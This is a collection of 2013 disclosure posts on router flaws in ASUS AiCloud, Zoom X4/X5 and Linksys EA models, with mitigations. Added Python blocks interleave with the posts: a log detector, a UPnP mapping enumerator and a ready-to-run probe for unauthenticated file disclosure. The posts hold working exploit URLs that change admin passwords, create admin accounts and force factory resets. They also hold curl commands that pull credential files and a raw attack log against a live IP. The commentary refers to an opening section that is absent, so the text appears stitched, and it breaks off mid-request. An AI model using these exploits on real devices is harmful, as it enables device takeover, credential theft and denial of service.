RT-AC66R   Dual-Band Wireless-AC1750 Gigabit Router
RT-AC66U   Dual-Band Wireless-AC1750 Gigabit Router
RT-N66R    Dual-Band Wireless-N900 Gigabit Router with 4-Port Ethernet Switch
RT-N66U    Dual-Band Wireless-N900 Gigabit Router
RT-AC56U   Dual-Band Wireless-AC1200 Gigabit Router
RT-N56R    Dual-Band Wireless-AC1200 Gigabit Router
RT-N56U    Dual-Band Wireless-AC1200 Gigabit Router
RT-N14U    Wireless-N300 Cloud Router
RT-N16     Wireless-N300 Gigabit Router
RT-N16R    Wireless-N300 Gigabit Router

-
Vulnerabilities - Due in large part to an exposed $root share on the
NVRAM for the Samba service, which was discovered in March of this
year by another researcher, end users of almost all of the above
models that have the AiCloud service enabled will find themselves
exposed to multiple methods of attack and several dangerous remote
exploits.

Since authentication can be simply bypassed via directory traversal on
those units running HTTPS WebDAV, all files which control services on
either side of the router are wide open to remote manipulation. All
.pem and key files are also openly available.

Credentials-
Almost all models will disclose a clear text credential file, making
any MD5 hashing in the /etc/shadow file meaningless. This file
remains easily accessible and has no encryption. Its location may
vary a bit on a small percentage of routers configured a certain way.

(The -L and -v switches are optional)

curl -v https://IP/smb/tmp/$dir/lighttpd/permissions -k -L
or
curl -v https://IP/smb/tmp/lighttpd/permissions -k -L

PPTP Tunnel-
VPN service can be enabled, configured and connected by altering five
small files on any of the four models of the RT66 series routers.
Everything needed to achieve this can be found in the directory at
/smb/tmp/$dir/pptpd, and the pptpctrl file as well as the pptpd
service are in the /sbin dir.

Local executable or modifiable scripts-
The files needed to create a Dropbear SSH service can be found at
/smb/tmp/etc/dropbear/, with its pid sitting in /var. In /smb/tmp/bin
and /smb/tmp/sbin sit well over a dozen executables such as netcat,
ftpget, logger, wol, tr and sendmail. Several services, two of which
are /smb/sbin/vsftpd and /smb/sbin/telnetd, can be configured or
altered there too. Other shell scripts, not native to the routers, can
be uploaded and used in an attack with little difficulty.

On the RT-N16 and N16R, once the HTTPS credentials are entered, an
attacker can easily move to the admin console on the LAN side by
changing the path to /index.asp. While the list of tools available to
an attacker might seem endless, there is no doubt that once the
AiCloud service is enabled, it would take just one person a few
minutes to take complete control of all traffic coming in and out of
the LAN, gain access to all LAN side resources by VPN or through
another service, and then choose to sniff packets, mount a hard DoS or
launch attacks on other systems.

Mitigation and Workarounds-
Disable all UPnP services
Disable any and all of the three AiCloud items which will open the vulnerability
Remove any remote access to the router for administration until a patch is ready
Change the default username and password
If the AiCloud service is used, it would be advisable to change that
password if it was the same one used for the router


Zoom X4/X5 ADSL Modem and Router -Unauthenticated Remote Root Command Execution

2013-07-09 Thread kyle Lovett
Vulnerable Products -

Zoom X4 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0
Virata-EmWeb/R6_2_0 Server, all GS firmware versions
Zoom X5 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0
Virata-EmWeb/R6_2_0 Server, all GS firmware versions

Note: A similar vulnerability was reported several years ago on the
Zoom X3 ADSL Modem using a SOAP API call. Many of these
vulnerabilities affect X3 in the same manner, without needing to use a
SOAP API.

===

Vulnerability-
When UPnP services and WAN HTTP administrative access are enabled,
authorization and credential challenges can be bypassed by directly
accessing root privileged abilities via a web browser URL.

All aspects of the modem/router can be changed, altered and controlled
by an attacker, including gaining access to and changing the PPPoE/PPP
ISP credentials.



Timeline with Vendor-
Have had no response from Zoom Telephonics since first reporting the
problem on June 28. Subsequent emails have been sent with no response.

Root Cause Observed-
-As in most IGD UPnP routers and modems where root vulnerabilities are
prevalent, these modems contain the same privileged tunnel, allowing
either side of the router to be traversed without authentication. The
code and layout of the device play a large role as well.

Code/Script Vulnerabilities-

-Form tags and action ids that are usually hidden are easily seen in
the HTML source, no sanitization of client side input is occurring,
and root overrides such as 'Zadv=1' can be invoked by any user.

-No cookie authentication is done once the first bypass is executed,
allowing 'Cookie: sessionId=invalid' to pass admin commands.

-The SQL injection 'UNION SELECT 1,2,3,4,5,6,7--' appended to any URL
page that calls a table value, such as /MainPage?id=25, will bring up
the system status page, with each interface visible and selectable.

Patches or Fixes-
At this time, there are no known patches or fixes.

Vulnerability proofs and examples-
All administrative items can be accessed through these two URLs

--Menu Banner
http://IP/hag/pages/toc.htm

-Advanced Options Menu
http://IP/hag/pages/toolbox.htm

Example commands that can be executed remotely through a web browser
URL, or via modified HTTP GET/POST requests-

-Change Password for admin Account

On Firmware 2.5 or lower
http://IP/hag/emweb/PopOutUserModify.htm/FormOne?user=admin&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

On Firmware 3.0-
http://IP/hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

-Clear Logs
http://IP/Action?id=76&cmdClear+Log=Clear+Log

-Remote Reboot to Default Factory Settings-
Warning - For all intents and purposes, this action will almost always
result in a long term Denial of Service attack.
http://IP/Action?reboot_loc=1&id=5&cmdReboot=Reboot

-Create New Admin or Intermediate Account-
On Firmware 2.5 or lower
http://IP/hag/emweb/PopOutUserAdd.htm?id=70&user_id=newintermediateaccount&priv=v2&pass1=123456&pass2=123456&cmdSubmit=Save+Changes

On Firmware 3.0-
http://IP/hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=admin&user_id=newadminaccount&priv=v1&pass1=123456&pass2=123456&cmdSubmit=Save+Changes

Mitigation and Workarounds-
Adv. Options -- UPnP -- Disable UPnP -- Write Settings to Flash -- Reboot
Adv. Options -- Firewall Configuration -- Enable 'Attack Protection',
'DoS Protection' and 'Black List' -- Write Settings to Flash
Adv. Options -- Management Control -- Disable WAN Management from all
fields -- Write Settings to Flash
Always change the default username and password, though this will
not help mitigate this vulnerability
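The advisory above gives the request shapes an attacker uses (the EmWeb admin pages under /hag/, the /Action handler, the 'Zadv=1' root override, the 'sessionId=invalid' cookie, and the UNION SELECT on /MainPage?id=). Here is an added example, not part of the advisory and not Zoom's code, of the detection logic a defender in front of such a modem would write over request logs. The log format (source IP, method, request target, cookie value) and the sample lines are constructed for this example; the request targets reuse the parameters quoted above. Treating RFC 1918 sources as the LAN side is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log: "src_ip method request_target cookie" per line.
# The request targets reuse the parameters quoted in the advisory; the
# format, hosts and session values are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 GET /hag/pages/toc.htm -
203.0.113.7 GET /hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes sessionId=invalid
203.0.113.7 GET /Action?reboot_loc=1&id=5&cmdReboot=Reboot sessionId=invalid
192.168.1.20 GET /hag/emweb/PopOutUserAdd.htm?id=70&user_id=bob&priv=v2&pass1=x&pass2=x&cmdSubmit=Save+Changes sessionId=8f3a
198.51.100.9 GET /MainPage?id=25%20UNION%20SELECT%201,2,3,4,5,6,7-- -
192.168.1.20 GET /index.htm sessionId=8f3a
"""

# Paths the advisory names as reaching the EmWeb admin handlers.
ADMIN_PATH_PREFIXES = ("/hag/", "/Action")
# parse_qs decodes '+' as a space, so the key of "cmdClear+Log=..." is "cmdClear Log".
STATE_CHANGING = {"cmdSubmit", "cmdReboot", "cmdClear Log"}
# Assumption: RFC 1918 sources are the LAN, everything else is WAN.
PRIVATE_SRC = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")
UNION_SELECT = re.compile(r"\bunion\b.{0,10}\bselect\b", re.I)
# Findings that on their own justify an alert; a session-backed LAN change does not.
ALERTING = {"admin-path-from-wan", "zadv-root-override",
            "no-valid-session", "sqli-union-select"}


def classify(line):
    """Return the source, path and list of findings for one log line."""
    src, _method, target, cookie = line.split()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    if url.path.startswith(ADMIN_PATH_PREFIXES):
        if not PRIVATE_SRC.match(src):
            findings.append("admin-path-from-wan")
        if params.get("Zadv") == ["1"]:           # the root override
            findings.append("zadv-root-override")
        if cookie in ("-", "sessionId=invalid"):  # no or bogus session cookie
            findings.append("no-valid-session")
        if STATE_CHANGING & set(params):          # password change, reboot, log clear
            findings.append("state-change")
    if UNION_SELECT.search(unquote(url.query)):   # the /MainPage?id= injection
        findings.append("sqli-union-select")
    return {"src": src, "path": url.path, "findings": findings}


def scan(log_text):
    """Classify every non-empty line of a log."""
    return [classify(l) for l in log_text.splitlines() if l.strip()]


def alerts(log_text):
    """Only the lines carrying at least one alert-worthy finding."""
    return [r for r in scan(log_text) if ALERTING & set(r["findings"])]


if __name__ == "__main__":
    for hit in alerts(SAMPLE_LOG):
        print(hit["src"], hit["path"], ",".join(hit["findings"]))
```

The query string is decoded with parse_qs before matching so that URL-encoded variants of 'Zadv=1' are not missed, and the UNION SELECT check runs over the unquoted query for the same reason. A LAN-side change carrying a real session cookie is recorded as 'state-change' but not alerted on, which keeps the rule from paging on the owner's own admin work.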


Linksys EA - 2700, 3500, 4200, 4500 w/ Lighttpd 1.4.28 Unauthenticated Remote Administration Access

2013-07-02 Thread kyle Lovett
Vulnerable products : Linksys EA2700, EA3500, E4200, EA4500 using
lighttpd 1.4.28 and Utopia on  Linux 2.6.22

Firmware Version: 1.0.14  EA2700
Firmware Version: 1.0.30  EA3500
Firmware Version: 2.0.36  E4200
Firmware Version: 2.0.36  EA4500

Impact: - Major

Timeline: - Still awaiting word back from Linksys support. Partial
disclosure at the present due to the impact; Full disclosure in near
future if warranted.

Vulnerabilities:
- Unauthenticated remote access to all pages of the router
administration GUI, bypassing any credential prompts under certain
common configurations (see below)
- Direct access to several other critical files, unauthenticated as well

Vulnerability Conditions seen in all variations:

- Remote Management - Disabled
- UPnP - Enabled
- IPv4 SPI Firewall Protection - Disabled

Although not the same symptoms as the bug that plagues most ASUS
routers that are AiCloud enabled with WebDav, the utilization of both
UPnP and SSL on lighttpd v 1.4.28 appears to be an extremely
problematic combination, exposing certain vulnerabilities to the WAN
side of the router.

Recommendations-

- Disable UPnP
- Enable at minimum the built in IPv4 SPI firewall
- Oddly, in some instances, resetting the password and doing a full
power down reboot has been shown to close the vulnerability, but not always
- Disallow remote access from the WAN side - both http and https
- Changing the default user name and password won't help in this case,
but it always bears repeating
- Since an attacker has access to enable FTP service, USB drives
mounted in the router should be removed until a patch is out, or the
full scope of the issue is known

Testing additional firmware is ongoing.
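The condition common to this post and the others in this thread is UPnP being enabled, and the opening section's point about NAT traversal is that an IGD stack can end up holding a WAN-to-LAN mapping that nobody asked for. The first thing a practitioner checks is therefore what the router's IGD currently has in its port-mapping table. What follows is an added example of that check, not code from the post or from Linksys: it walks the table with the standard WANIPConnection:1 action GetGenericPortMappingEntry (index 0, 1, 2, ... until the device returns UPnP error 713) and flags mappings whose internal client is the router's own LAN address on a management port. The control URL is assumed to have been read from the device description XML beforehand (not shown); fake_igd_post and its two mappings are constructed so the block runs offline. The post does not say the exposure it describes is caused by such a mapping; this is the check that rules that in or out.

```python
import re
import urllib.request
import urllib.error
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
ACTION = "GetGenericPortMappingEntry"
FIELDS = ("NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
          "NewInternalClient", "NewEnabled", "NewPortMappingDescription",
          "NewLeaseDuration")


def build_request(index):
    """SOAP envelope and headers for GetGenericPortMappingEntry(index)."""
    body = ('<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="%s" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            '<s:Body><u:%s xmlns:u="%s"><NewPortMappingIndex>%d</NewPortMappingIndex>'
            '</u:%s></s:Body></s:Envelope>') % (SOAP_NS, ACTION, WANIP, index, ACTION)
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": '"%s#%s"' % (WANIP, ACTION)}
    return headers, body


def parse_entry(xml_text):
    """Dict of the mapping fields, or None on a SOAP Fault (error 713 = end of table)."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    if root.find(".//{%s}Fault" % SOAP_NS) is not None:
        return None
    entry = {}
    for tag in FIELDS:                      # response arguments carry no namespace
        el = root.find(".//" + tag)
        entry[tag] = (el.text or "").strip() if el is not None else ""
    return entry


def http_post(control_url, headers, body):
    """Real transport: POST the envelope to the IGD control URL."""
    req = urllib.request.Request(control_url, data=body.encode(),
                                 headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:     # UPnP errors arrive as HTTP 500 + Fault
        return e.code, e.read().decode("utf-8", "replace")


def enumerate_mappings(control_url, post=http_post, limit=256):
    """Walk indexes 0..limit-1 until the device reports the index is invalid."""
    mappings = []
    for i in range(limit):
        headers, body = build_request(i)
        _status, text = post(control_url, headers, body)
        entry = parse_entry(text)
        if entry is None:
            break
        mappings.append(entry)
    return mappings


def exposing_router_admin(mappings, router_lan_ip, admin_ports=(80, 443, 8082)):
    """Enabled mappings that forward a WAN port to the router itself on an admin port."""
    return [m for m in mappings
            if m["NewEnabled"] == "1"
            and m["NewInternalClient"] == router_lan_ip
            and m["NewInternalPort"].isdigit()
            and int(m["NewInternalPort"]) in admin_ports]


# ---- constructed offline stand-in for an IGD (not a real device capture) ----
FAULT_713 = ('<?xml version="1.0"?><s:Envelope xmlns:s="%s"><s:Body><s:Fault>'
             '<faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring>'
             '<detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0">'
             '<errorCode>713</errorCode><errorDescription>SpecifiedArrayIndexInvalid'
             '</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>'
             % SOAP_NS)
_CONSTRUCTED_TABLE = [
    ("", "443", "TCP", "443", "192.168.1.1", "1", "https", "0"),       # router itself
    ("", "51413", "TCP", "51413", "192.168.1.50", "1", "torrent", "0"),  # a LAN host
]


def fake_igd_post(control_url, headers, body):
    idx = int(re.search(r"<NewPortMappingIndex>(\d+)<", body).group(1))
    if idx >= len(_CONSTRUCTED_TABLE):
        return 500, FAULT_713
    vals = dict(zip(FIELDS, _CONSTRUCTED_TABLE[idx]))
    inner = "".join("<%s>%s</%s>" % (t, vals[t], t) for t in FIELDS)
    return 200, ('<?xml version="1.0"?><s:Envelope xmlns:s="%s"><s:Body>'
                 '<u:%sResponse xmlns:u="%s">%s</u:%sResponse></s:Body></s:Envelope>'
                 % (SOAP_NS, ACTION, WANIP, inner, ACTION))


if __name__ == "__main__":
    table = enumerate_mappings("http://192.168.1.1:2869/ctl/IPConn", post=fake_igd_post)
    for m in exposing_router_admin(table, "192.168.1.1"):
        print("WAN %s/%s -> %s:%s (%s)" % (m["NewExternalPort"], m["NewProtocol"],
              m["NewInternalClient"], m["NewInternalPort"], m["NewPortMappingDescription"]))
```

Against a real device, swap fake_igd_post for the default http_post and pass the controlURL from the WANIPConnection entry of the device description. Walking by index is the only portable way to list the table, since the IGD profile has no "list all" action in version 1.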


ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln

2013-06-24 Thread kyle Lovett
Vulnerable product: ASUS RT-N66U when HTTPS web service via AiCloud is enabled
(AC66R and RT-N65U are affected as well, but need more testing)

Vulnerabilities:
- Linux 2.6.22 - Researched on both 3.0.0.4.270 and 3.0.0.4.354 firmware
- Full directory traversal and plain text disclosure of all sensitive
files, including /passwd and /shadow
- Full access to webdav.db and smbdav.db
- Ability to traverse to any external storage plugged in through the
USB ports on the back of the router

Not fully confirmed, but seen in several tests and probable:
- Uploading of malicious JavaScript into the Smart Sync folder, which
is then sent to the host when they perform their scheduled sync
- Ability to often alter iptables, DNS, firewall settings and many
other configurations without authentication

Likely but needing additional testing (listed because the potential
for an attacker to gain a PPTP tunnel to an extremely large number of
routers is quite possible and extremely dangerous):
- Ability to change or alter configuration files normally only changed
through the GUI web admin console
- Ability to enable VPN service with PPTP (needs far more testing)
- Suppress logging through disabling a configuration switch

Timeline:
- Contacted ASUS two weeks ago (under my online handle account) around 06/06
- Second email sent on 06/10 when I discovered the first unauthenticated
file disclosure
- Received only one response back stating it was not an issue
- Sent a third email on 06/14
- Only response received was an acknowledgement that my email was received
- Attempted to call their development or incident team, and was told
that someone would call me back on 06/17
- Sending another email today under my real name

The vulnerability is that many, if not almost all, N66U units that
have enabled HTTPS web service access via the AiCloud feature are
vulnerable to unauthenticated directory traversal and full sensitive
file disclosure. Any of the AiCloud options Cloud Disk, Smart Access
and Smart Sync (need another verification on this one) appear to
enable this vulnerability.

When AiCloud is enabled, web access defaults to port 443 and content
streaming to HTTP port 8082. Depending on numerous configuration
factors and which firmware version is used, the directory structure,
and which files are disclosed when bypassing authentication, varies.
Both ports will disclose the information, port 8082 being of the most
concern since, for now, the web access via mini_httpd on port 80 is
not as vulnerable to directory traversal. More urgent testing needs to
be done here. HTTPS uses lighttpd v1.4.29.

The UPnP bug concerning the exposed hidden $root Samba share, which
allows simple wget commands to grab four sensitive XML files, is
already well known: http://seclists.org/fulldisclosure/2013/Mar/126
The $root share is part of the problem; however, UPnP does not need to
be enabled for the vulnerability to be active. Using basic cURL
commands, all sensitive information can be obtained given the right
directory path. Credit for finding this bug, or at least I think it
was them, goes to the folks at http://www.websecuritywatch.com/ I'm
sure he will confirm the difficulty in dealing with ASUS.

ex:
(-v is helpful to see that SSL allows bypass of authentication, even
when it recognizes a bogus cert is being used)

-e is optional, but on a few settings, setting it to 192.168.1.1
allows for bypass

--cacert with any fake .pem file for 192.168.1.1 will work, and often
this flag is optional

curl -v https://IP/smb/tmp/lighttpd.conf -k -L --cacert fake.pem -e http://192.168.1.1
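The curl line above, together with the 'permissions' paths in the ten-model post and the /hag/ pages in the Zoom post, is a one-path-at-a-time check. As an added example that is not the post's own tooling (nor ASUS's or Zoom's), here is the same probe in Python so it can be run over a list of paths and hosts: certificate verification is off (curl -k, because the device presents a self-signed CN=192.168.1.1 certificate), redirects are followed (curl -L), the Referer is set (curl -e), and any crypt(3)-style hash in a returned body is counted rather than echoed into a report. The path lists are the ones quoted in the posts; the $dir variant is left to the caller since the directory name is not given. constructed_fetch and its canned bodies are stand-ins for offline use, and the real format of the 'permissions' file is not shown on this page, so the constructed shadow-style line is for illustration only.

```python
import re
import ssl
import urllib.request
import urllib.error

# Paths quoted in the posts (ASUS AiCloud over HTTPS, Zoom EmWeb over HTTP).
ASUS_AICLOUD_PATHS = (
    "/smb/tmp/lighttpd.conf",
    "/smb/tmp/lighttpd/permissions",
    "/smb/tmp/etc/dropbear/",
    "/smb/tmp/bin/",
    "/smb/tmp/sbin/",
)
ZOOM_ADMIN_PATHS = ("/hag/pages/toc.htm", "/hag/pages/toolbox.htm")

# crypt(3) hash fields as they appear in a shadow file: $1$ (MD5), $5$, $6$.
CRYPT_HASH = re.compile(r"\$[156]\$[^$:\s]{1,16}\$[./A-Za-z0-9]{10,}")


def http_fetch(url, referer="http://192.168.1.1"):
    """Equivalent of 'curl -k -L -e <referer> <url>'. Returns (status, body)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # the device's cert is CN=192.168.1.1
    ctx.verify_mode = ssl.CERT_NONE     # and self-signed: this is the -k
    req = urllib.request.Request(url, headers={"Referer": referer,
                                               "User-Agent": "curl/7.26.0"})
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def probe(base_url, paths, fetch=http_fetch):
    """One result dict per path. A 200 with a body means 'served without
    credentials', nothing more: what the file is depends on the firmware."""
    results = []
    for p in paths:
        status, body = fetch(base_url.rstrip("/") + p)
        results.append({
            "path": p,
            "status": status,
            "bytes": len(body),
            "unauthenticated": status == 200 and len(body) > 0,
            "crypt_hashes": len(CRYPT_HASH.findall(body)),  # counted, never printed
        })
    return results


def report(results):
    """Short text summary suitable for a ticket; hashes never appear in it."""
    lines = []
    for r in results:
        flag = "OPEN" if r["unauthenticated"] else "closed"
        extra = " (%d crypt hashes)" % r["crypt_hashes"] if r["crypt_hashes"] else ""
        lines.append("%-7s %3d %6dB %s%s" % (flag, r["status"], r["bytes"], r["path"], extra))
    return "\n".join(lines)


# ---- constructed offline stand-in for http_fetch; bodies are invented ----
_CANNED = {
    "/smb/tmp/lighttpd.conf": (200, 'server.document-root = "/tmp/lighttpd/www"\n'),
    # shadow-style line for illustration; the real file's format is not on this page
    "/smb/tmp/lighttpd/permissions": (200, "admin:$1$abcdefgh$2h3WQ5xN9ZyuNdBG7Ojeo1:0:0\n"),
}


def constructed_fetch(url):
    path = "/" + url.split("//", 1)[1].split("/", 1)[1]   # strip scheme and host
    return _CANNED.get(path, (404, ""))


if __name__ == "__main__":
    print(report(probe("https://192.0.2.1", ASUS_AICLOUD_PATHS, fetch=constructed_fetch)))
```

Run it against a real unit with the default fetch and the host's WAN address; for the Zoom pages use an http:// base and ZOOM_ADMIN_PATHS. The point of counting hashes instead of printing them is that the probe's own output otherwise becomes the credential leak it is looking for.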

Once I found this conf file, along with parsing the DOM bindings using
firebug on the HTTPS AiCloud login page, I was able to piece together
the directory structure. It is important enough to post here.

root@Qanan:~# curl https://208.xxx.xx.xxx/smb/tmp/lighttpd.conf -k -L --cacert ASUS.pem
* About to connect() to 208.xxx.xx.xxx port 443 (#0)
*   Trying 208.xxx.xx.xxx...
* connected
* Connected to 208.xxx.xx.xxx (208.xxx.xx.xxx) port 443 (#0)
* successfully set certificate verify locations:
*   CAfile: ASUS.pem
  CApath: /etc/ssl/certs
* SSLv3, TLS handshake, Client hello (1):
* SSLv3, TLS handshake, Server hello (2):
* SSLv3, TLS handshake, CERT (11):
* SSLv3, TLS handshake, Server key exchange (12):
* SSLv3, TLS handshake, Server finished (14):
* SSLv3, TLS handshake, Client key exchange (16):
* SSLv3, TLS change cipher, Client hello (1):
* SSLv3, TLS handshake, Finished (20):
* SSLv3, TLS change cipher, Client hello (1):
* SSLv3, TLS handshake, Finished (20):
* SSL connection using ECDHE-RSA-AES256-SHA
* Server certificate:
*   subject: C=US; CN=192.168.1.1
*   start date: 2009-12-31 04:48:00 GMT
*   expire date: 2020-01-01 16:48:00 GMT
*   common name: 192.168.1.1 (does not match '208.xxx.xx.xxx')
*   issuer: C=US; CN=192.168.1.1
*   SSL certificate verify result: self signed certificate (18),
continuing anyway.
 GET /smb/tmp/lighttpd.conf HTTP/1.1
 User-Agent: curl/7.26.0